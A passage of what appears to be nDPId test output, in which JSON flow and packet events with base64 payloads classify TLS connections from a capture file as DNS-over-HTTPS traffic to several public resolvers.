BCNp7SmZtoObLBfKyYFLS1OdeJn33VC7QU5ZIB0TIGMOnasD1IIceFavDDD1uWjFat9U8TSvdQkrVOP0H+iiog+bscrfkzNeLsrOj5JaS96ZDARUESAXVBQE+wq3Z0J6WrNdNJCanh0R13lIIfbBO3tp1JQaYJcU43NTOBatEStIgR6pggN4HF+DO2dNPqB6DJlllwkNWiMSwaSg\/Qokswn+fLJvn7pPXb8ILKczNLht2jz9aEp0+I8QfJ9sljCRmG\/qdZknc3MVkUZCxQWgeYvnw16OCgKVrO7aXg97ZXgFQywgIz4XcG4cQlmlUgZ5vBckLpEq1wb47O2DC7oYeIkB7WvMn7pIP5qKMmIewtCOip18QV5mNZQ7kfdTHrJyhNEAXbfaMkBbJyAVJGCBIYwvhIF13Izb7B6Cmnolxq1r5eurWQOB44xUuJop6m5Nm5hxmATag\/xOQnBP8r2vNMxUihmUT8anHH3UfjXAY915xtFCA13IdATjUK5r\/nOjWuYELtJmgRJ2oeyJFl+xU3enOifKqvSW9w3npBMuO6+ND+s2KXgdXZpDonBBs70SsK8NzgIT\/8A0se3txfhbwpY2EseDOLiVbMtTN8WhjrhnZpDEjzwdCV8jV8ki7+xTW6Ae32nBN9uRAZ20gpXPNrrgk+1oPaXal74NAuojgux90nmy7fGQvJ\/CCkJUFP2+xt7moAmNV6Bvh9GIV51tdhbag9+AtGmBI8WUGXz9QPwduT4nOO+Ia6cTJuP1+CL3tb+p6ijB1Jg583CQ8vtkm3Pw8NXcvYMcBOIpsKkRrBsD67+irg6nQFwMDARkSIsFlIX96rBVOSHF8j3nD4OzTmAKQfrZ20qhfNZw8PH0q41dWeUeDXwstCBpDPbSnxrC2ED\/1S7AKbK3628b0BuTXrCb9vI9IIN\/fjnNzXGCyCTfNGyQC7Z2s3ZZgGilAyQTgWS6IBv0X\/cXimIPEtNGeEgUfHp2ZiHChqtgUwdJbYZhYRpk9Vh4PP\/G\/geKDMJuF9LkfMNZa2A5\/kJwnnbAN+9JGdzxyQUZGqq8DCQqxQ4uAbnIJmcLNJBx9PHCzhhj8vk0E7hUaqEkvClX1iiIhNhFlmQ9FsqBvx5KYUvaVI86YI314BKZUdBn0Gn9Psqh3g3PCqYbuhSA+KXAHAB6ifkPpQbZxhpKA+yQN\/aKxaWBvyR8fvBcDAwBFUlHyM0i8aQGJ+PRPScWQmM6JruXTVxzLP2v5t10WMRjAfhtdK+kbZwmOwuBqS0fXovjROfDM5rGu95fh\/DYXUBWZSAER"}
00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":267,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739354159,"flow_last_seen":946739354179,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":3399,"flow_avg_l4_payload_len":1699,"midstream":1,"thread_ts_msec":946739354179,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":946739354182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739354182,"pkt":"REREREREZmZmZmZmCABFAAB4sYBAAL0GQFYKAAABuetRAa5gAbtwXMQ7YngMcFAYAfXMEwAAFAMDAAEBFwMDAEWXq32pwHEzhcGDp\/NKLjvxgMAkksKxKcFIOFCDodEb90S6h8Gu0G\/BLuFfZ5sttQB7HESBT0tBjYEfHL61VthvR6QOjls="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739374011,"flow_last_seen":946739374011,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739374011,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":946739374011,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739374011,"pkt":"REREREREZmZmZmZmCABFAAFF9DpAAH4GIdcKAAABdMqwGqhiAbtWR3H7NJTy0VAYAfbm2AAAFgMBARgBAAEUAwO\/FCTCx\/QYlyW+S6EGE0TFYQ1H3k3FO+5pvJMM4NWMBSCY7MF+HV8NsAFc82xlqHj0YcQW9bewwKxZQwscQJJKpgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmxpYnJlZG5zLmdyAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIOxloY7MOWvSgZ3hQaojp9inJ84Sw+igf7hW9Y3pU+ch"}
00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739374011,"flow_last_seen":946739374011,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739374011,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.libredns.gr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":946739374036,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3179,"pkt_l4_len":3145,"thread_ts_msec":946739374036,"pkt":"ZmZmZmZmRERERERECABFAAxdEw5AADYGP+x0yrAaCgAAAQG7qGI0lPLRVkdzGFAYAfXx8AAAFgMDAHoCAAB2AwMfdsQbzuiYRNDg0SBjCCwcHmnTX\/WaALeQBUBykWdcaiCY7MF+HV8NsAFc82xlqHj0YcQW9bewwKxZQwscQJJKphMCAAAuACsAAgMEADMAJAAdACCFS52dOnPWMZ+6KGOu9y\/QLNkNywSlNldrBcP9ygUsJBQDAwABARcDAwAkRYbUEe0KLtMYBo7DwIYWcyipqqBN\/bxVehyh0Sw6cb936jKFFwMDChoofwyGB1vpwXv7Xn4hXSbG1vtIeMernYPn5eAfJWckDiE1Vl5RxqW26TSWUTfmtG\/80SN\/HcC8sF8BZiFAAmCY47UJ7uXvVoDqw8BmwUzQhTAJ8CR9FaoGVeJsM5UnR3QsIEHqP5KqlB9iD+UdFFEShzmfIEBTbyB2lP4pQWBOWz2wOPIXZhQnKMJCxu1mnXifSB+KRolJ9fD2dQ4Cx5+85+F56fGG9StYfwFmGPIeJARJjwh49nZDI4iYWv+ddPBM2\/KJRuF+1TvTRam5R+I0m2+MFl1IOG\/mGs22lUpFRiEafHau8IgYwLtIsVJVRXeEF23eSSLjZSGlI+95kanzpb7Gq+bxaPB\/4KE\/EZB\/HHORaklfdEzQyROMT29wGcN987isDVey45rLfbLMKOZqZTAfIY9fCmEJfoMGXsfxScuGJL3kk9ktG5XOrDaDe+Mw8iBMs6aCgsJWCKp9AlmnI6jM+Pkj5pJEm1bom4ksHEDAz1NZ0ftN\/sVLZn9Ug2C7F7lT1GzkA6PKlKc6EZ2z5CZ6jJ2Z6Y6MlAZziPoOQu4qTh3J+nE8GcgGOJ+4zh9BbyrU\/zs1GjsbXVkHAo7jDaYOsfbK6OwpKfl4fhdC60RX1KjskIAX35OHA\/IXKzAnkgHHInCPGyjRoDeCN\/xxIMzVFrKXTCwf2SPOaQSeCd\/JvCgSVj\/dHhq8zdYnlFf+z9VXpf9xqp8dTGqqOXUGFnDAdjBQ71FnqfI6ubmeRFAjPpvyUbaEAnejXwHU9g6Nb1kInR39UeMaOlkv2XbX4eVVedQBnQ80TEebS+RYgvF4z+JaZdzTDBKsiCrr90MrJqELQ15ruqB7RM0T7bzUmBAp55RHbt\/ccY\/TkG\/gVsixMDlDFkIhMYt9MdUi87PoFTfnAamhlvAw7oZO8\/F7iHmtBa\/Ep7E0DP9U5QDAi98hWmChSAXTUreygTLQuqQnUJmosGexWw5Cm8TG3r4N5gnkEVB3HVNF0Bviuw4E\/LgbkZLCP6\/4igcruIsBRgEN00dS6JnGlucNL86jMmrPxWv6fGd6uX4GyIhA8xlh3VmZmkdtEaBCAvedT6MuQU0ug0OS0vhYWi4hpFSwBYkEc7nVVyMbvGRC\/t6cdur00RqtQCHbN+NyMsAYQCMLcN\/MBgJi53gtKoOeVRxL9efr0oSMfPFjg62k6KC1lR+0S5m3Izs0xuBIpZ4qwdqzDBYxqETxd2mAw6qyV9\/+c2vTZTjQfcpnp7y1uBxTcCkKvdXtnytMj88r6V3CNsrCqoiP+HgdZ35NIzfdjE8dt6Do9yQiQH9DyOtUx8mNKBWoW2GsDQem5ZGAtDwjmFRhkWEqvnuAWeKZRQvsxDNQX1VGCheiYk47AXsweypHM0kF7Sz+NMdgmJ2lYhFlZ1\/ixGlfZSk6mjv0hogoEvvV0z6\/T5ayYUiYrSxxE5CRTBXiQ0ShTnl8JnNrX5f1+PEHiTs9VmgpKgcqyhnAx43FvFz+tjAq2kHUpARsisN76U\/4szTnIzPWHuhFJGJXIYtA6KvZZsRr8X45Bjm7782fphZHssP9T11fz+rMBuNZkB+9kENQs834qUDrDWQYlgtgokMydJHahHIc4rs8RwpnWkwnfbjQyRwpkoSDjqKCsoWgqmckVcAlWtfj+PYNdYUV0GJVz3MaCILZ2I6i8QDOlFT6AvpNPYOGoGbJ0wKc\/iRHcSqwHkLOlqAj9rNOane\/dG8vbDHghfqFdeNPvQAcyGldxWfqiN032Vix7+oZXOFXeLNRXDRdMWbSqMlyCprTcKldxAe+jYGRK\/SRNNln4bS6loI5LqK5kRj1qHOQs4VYAvb6aRZkpJmFfA051r9ZTveZwX8QvPcsUhSp6WJroM5RdVgMoZWRw3V3kLzy526l\/XjarCqs7b9zg4\/0UThyCoRZXRIaapKAxcisr606oQ90EO6V1\/rxbH5QoNdmuIBJXUiCC+vi9DaFQhw7IS7rYl6bCaQkE1gKVqVjcfGFNbkwZ6WVIIFLAd4AULNZ0EbDr3Jxz4Q1Kv61lNl9GOAmC73UocSHTqPhV\/xb9YLlv4Qj8A9VyOXsI3ysVAT7Q3JqQoSzzANJennQVJORrvCGjBFhIJA1XuVUswlY7d8l6GIPFEndkzdJv+mqLebs92Ve7y8gHX+5\/N3bWQDbvROspZd9Rw2VYwhVeRkdNNkB9Zd4yf0MJA6FKQTPIvZ1j4Zvrf8Zqj1FK4+Pu5YWK2VzQ1bAzEZ5TAhqXro79v42FstXXH9Bjh6xGWnYs4EgdjNtrw9q9vDDHzkCgGXErTBS5tZpn4eq4iayRQKOUo2Bjzuikc3GCcT7DGLOzNijLOjpstykBtjYEBagL1lzeuQbGqMxLzwOzMZiM6Cr4dH6Ct7enfPKr1l7EDqLb80TAVFsE6E9zPStbSvvDsesVjI0LnHLpiFF3QD7w\/cMgXGCCQFz4kjOyjxN1ueQ3BiQwzUZI\/KQVjymbQQOaDcU\/hamroqvDR3psu8zkzqDRgXxZpAhYSs0ypnNhUomh4K+raYSufO72xoIxT3MchbmB2xOG+FHTInGWwMp665VQ8P5TZyqYPfZdJpda3UJ4l4i+8AGeTKq9cySdx4swdISz3V3xxrTEFxvjq7CgCc0mdfHRwUrslFZ\/8xz\/GkZ7unKM4nUXsR2wjAWglEejYWAjwBH57asssV4a1smVbgfitfljZxOQxeCULZkhU5iCbDWtt61dkKbIg6Z5Ib6wqsZbKsTNF5BUW\/OluqVhEnnxYi4bC2p8oeMOIg9Xp0ohk+2eyHzNnL7PsT\/0TJd+8z\/6rR4GfsNhau8JwG0sVxaM3gQ\/C1BUi59C0tclt8uqB8v4sL+nw1kYxtxvVF+WgZBhsUG6jtsTkz\/h7Vqr1uE1yqk6VMywMNzSK3C6Y5jNYNZlGRunhyx+Wvqoy4kyzKlb5KJu0D6Ibb9tx4jkjfsAgRv1kb1\/YV+5pR9kOWTI7kTR0GhRhEcYVSuszO6GztHF17jUv1HGqvUE2Y1nYTruioVBGxNU2n\/3D8R0H0Ev+WM\/lE1CkAFwkkBnRPnHTXpqQgZZhPNhQeacIL4PiCwXLGj68pqU9sBR5k+Qs1xeKaXL1uB\/+DlBrxDF37H0xYTjNyCifmppE9xs8wUURoGCYQz8YrJzWYbNTp6iS3VA9PqxHbxpwe+T0EJG3w+ckQ4AZZWQJfpeYEAjUJVTV+JzyForU6vnGB\/f4UtM5hkLlLR2yX4QW5z2sMH+oemvxHSO3c4dMYOamZjpEAr8HZR\/eYtA\/+k47KLbbuC8LadTWp9kx60hq9j0ZTOjnZRbmpU7x4+baRS3lSZ4uCKQhRDRs1bz+OmCsokrpdBvyRNmpmdHu7+xcAAbWr3GDiMDDj2MeLocIu6VxMJmWwaV6i6S3OZRKsCOQTd0Jkp8jCBeqO4YH7rnKVrcOwj8x\/xgYsXAwMBGfgS0Z5JTGD28Vyg2LfJHOWz9mr0ZY69GFX94xRplNLJ90YhSqkDA41SrPaRCa\/yRHZpmo6Z1mQO81cAsIuYw3\/dzrRByb+dTIlW9yt\/sOP7usPp6PbdD4rTPrbEK4QR\/+wMzHeanap2HaJcY2tnK9Pk6wr3URSABWoCiW8bBJ44gM\/wYSxUIN9fZQXNHmUFX2+4E+pzfHMX+TPSUHrGMWaQGF+jm8f8JzgtBamlKFf0T7ESBzmOVDFYKLq5HkwIpwu7FecWONEwB4QKksZp77Ks7VMI9z7kgYi8fKP1AlrK0wJXYhtL9bgNIor7UcK\/cBVJ2AclPTcIWxPGf\/H2qC2ccHzN2oQA1YRLpy6QS\/qocCCtoi9irrhlFwMDAEUNWvqMs\/h03WKKdBMbYkawhmSS9CnEEwNmSHsUo0aFsC+NuRuOS7d+gyt4adOBPfCXNUuX7r\/jeMTBHE2RkzGNnd\/d06g="}
00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739374011,"flow_last_seen":946739374036,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3125,"flow_tot_l4_payload_len":3410,"flow_avg_l4_payload_len":1705,"midstream":1,"thread_ts_msec":946739374036,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.libredns.gr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":946739374036,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739374036,"pkt":"REREREREZmZmZmZmCABFAAB49DxAAH4GIqIKAAABdMqwGqhiAbtWR3MYNJT\/BlAYAfXmCwAAFAMDAAEBFwMDAEUX9381c\/+R1qgydby2LZz\/D1isDmITv8iB3tIfcLl3X1ZN85j+RzDG7ZR0PP5I0SioKkHY5OtmjMfBNJaLny9tLOB5RTM="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378281,"flow_last_seen":946739378281,"flow_idle_time":7560000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739378281,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00853{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":946739378281,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":344,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":344,"pkt_l4_len":310,"thread_ts_msec":946739378281,"pkt":"REREREREZmZmZmZmCABFAAFK6MRAAH4Gn0EKAAABVQVd5uaSAbv2ZmEwaR3\/oVAYAfZ05AAAFgMBAR0BAAEZAwPCcBaP\/DC8hVoTSokbsQvpjhaLnYrt7eKsiMQ8EXb5AyAAGOihE6CuqcDNXckkTdE7CmzbbGzUcC6GWkBVFb5CcQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACqAAAAGQAXAAAUaWJrc3R1cm0uc3lub2xvZ3kubWUABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg6FKiZGfISPafy0Na34RI3z\/9T8Zo5Ona0mhcVKXwyTI="}
00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378281,"flow_last_seen":946739378281,"flow_idle_time":7560000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739378281,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ibksturm.synology.me","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":946739378310,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":153,"pkt_l4_len":119,"thread_ts_msec":946739378310,"pkt":"ZmZmZmZmRERERERECABFAACL5iJAADQG7KJVBV3mCgAAAQG75pJpHf+h9mZiUlAYAFOUtgAAFgMDAFgCAABUAwPPIa105ZphEb4djAIeZbiRwqIRFnq7jF4HngniyKgznCAAGOihE6CuqcDNXckkTdE7CmzbbGzUcC6GWkBVFb5CcRMCAAAMACsAAgMEADMAAgAZFAMDAAEB"}
00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":304,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739378281,"flow_last_seen":946739378310,"flow_idle_time":7560000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":946739378310,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ibksturm.synology.me","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":946739378311,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":946739378311,"pkt":"REREREREZmZmZmZmCABFAAAu6MZAAH4GoFsKAAABVQVd5uaSAbv2ZmJSaR4ABFAYAfZzyAAAFAMDAAEB"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378577,"flow_last_seen":946739378577,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739378577,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":946739378577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739378577,"pkt":"REREREREZmZmZmZmCABFAAFDLylAAH4Gh5EKAAABaBwcIoO8AbvZKqUSoyMYWVAYAfZGMAAAFgMBARYBAAESAwNktN1XF4bqrby0niN\/MgT4p6NPXKBlRwOJCoza94pvXyD9DZHEPvQMzjP6pbu5TmyGbnG5vDXlt6MJFI6XifT24wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANanAudGlhcmFwLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBNe3CKgugpSU\/ahaeKXUN1ypv0O\/7wv4rJDS1FbyCQKA=="}
00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378577,"flow_last_seen":946739378577,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739378577,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jp.tiarap.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
03848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":946739378607,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2557,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2557,"pkt_l4_len":2523,"thread_ts_msec":946739378607,"pkt":"ZmZmZmZmRERERERECABFAAnv8ehAADcGAyZoHBwiCgAAAQG7g7yjIxhZ2SqmLVAYAEJO3AAAFgMDAHoCAAB2AwM5\/Tpf+0rVAVLiqp3AKzeP0oc5LUJ7LbPa16oj3TgNDiD9DZHEPvQMzjP6pbu5TmyGbnG5vDXlt6MJFI6XifT24xMBAAAuADMAJAAdACC6HV5GLKVmM89uM3s2SIWu43Lfyhq5unw8YJ6WUfrNYwArAAIDBBQDAwABARcDAwk9PLTYD+JT2QAppt0TUbAwAmxAstQCMsQy32ww9oSEEAAMGSMNt+TTdp0V3tZ3ctmeFKC8drVcJHMoKPW\/gLMtyIUmD\/3+eYMhUKtI+3FRz671m\/FiCxQ+DYhEAA2djrJV7bAD8riXyaqFyW2aaJF84flOMuq9DLwOUI0IypM1HnMNVT7vNmCordbJ4vYfoJCHZ3Jdxa1PMxflxUdqb7t2xbf5y\/m1Lgj+QBUEN2VGq3ZK1ktt1GgLlt5OMY6q\/EMncuhg\/OHccuz87CSxEURWL2O5XG3NQ8ZSkyDIF1XtrmR6FGXAhlzN0GIMFD4mIZ5QqyhyGprKsDD36CWqaTOR27WUIRMeWgua2kpjr+elVVRiIT0yfyvShMeR5KvvMj5AG9M4S4\/qWWxJjIv9qLfYm7RWSC4r34hNlFnFlqsqqqzzh\/BxMvV1bwxfAaqA1qBideWKRVA+7EuN95c4ue7X\/hRVHEx3iQLqTqKG9s8vcXeE42KLZOgVl3B7xu8\/i92\/WkhbHAp1VaoXVrJw6GLiISb\/po8DiOQt5NIdGX5eDQSEZ7O9baKasLWzq1YkwfZijF3n9KVs9qv2KSy5IfvS0SD4T0T96JowaLvO1lvBNbG7CindkMAn7au9+n1sxBnSgPOEhxjP6eP7I9klViNjl15nUFM6o4r0CQuVxRwVYjFh10tMhUtqr5ufjJtftBeIT7Z6ffMsMrzPdyzkIvDM+swGXo7V35YzVo8DyoBYe9uM0JJnrorf04OKftnG+pjuV1J118k\/TcF7dgWMascYwrYulqMRqr3vNGGbqZxylwmKp462M5UtGuo+qerBWSrRXWS6eh\/Pd34MrDX1VmvCOR23Z07RB6KZ9U0a03sYPKhsU\/m8X7Y3lJg3mFbu5qAjYzD1O+cD4Myf40iIoCP9xcs4bu1pUmgjVbsp3ut86GCDAgM+2h3m+dYO91dTNrC6JdnpsdKfoGqobbC1Nd6P0Kznfd6xn\/BQDvXNQHfd3IPzPYj2FRyDUuFDyWgT\/cwlGc7O60WUydzXXvs9ttqI8TuCUJYd1Ao8xx8mAgIvrwtyiwJR5QZQxYq0NnVo97JO1hRxuXJb+LTsywktm+cb6647KFCAIE22xi+EiXjOKZOlKgY\/++l2PKcbQh7+iHITgTYo09PyNcnTJxUwLKCZUcpj08uHLE+si9w6kmA+pKFDGKHD2OQi0\/dVl+2FqCH2+A3DCa2Gg9EWzElOrJ9mp3PsOzxGAh1T1616sYT0her6SVuXlhCGP0slwtRkTfN5tnJIo22tEgWtQ+b6y1PTsvRTouR9DpgUBw8BD3g0lRYqf3KAJIjUNpSvsRMGe0P3S4KCcJTz19EnjfZoP6uX+a1+4rjk2AihvF76LGF5wO7bsnmmIDYTvndhSZ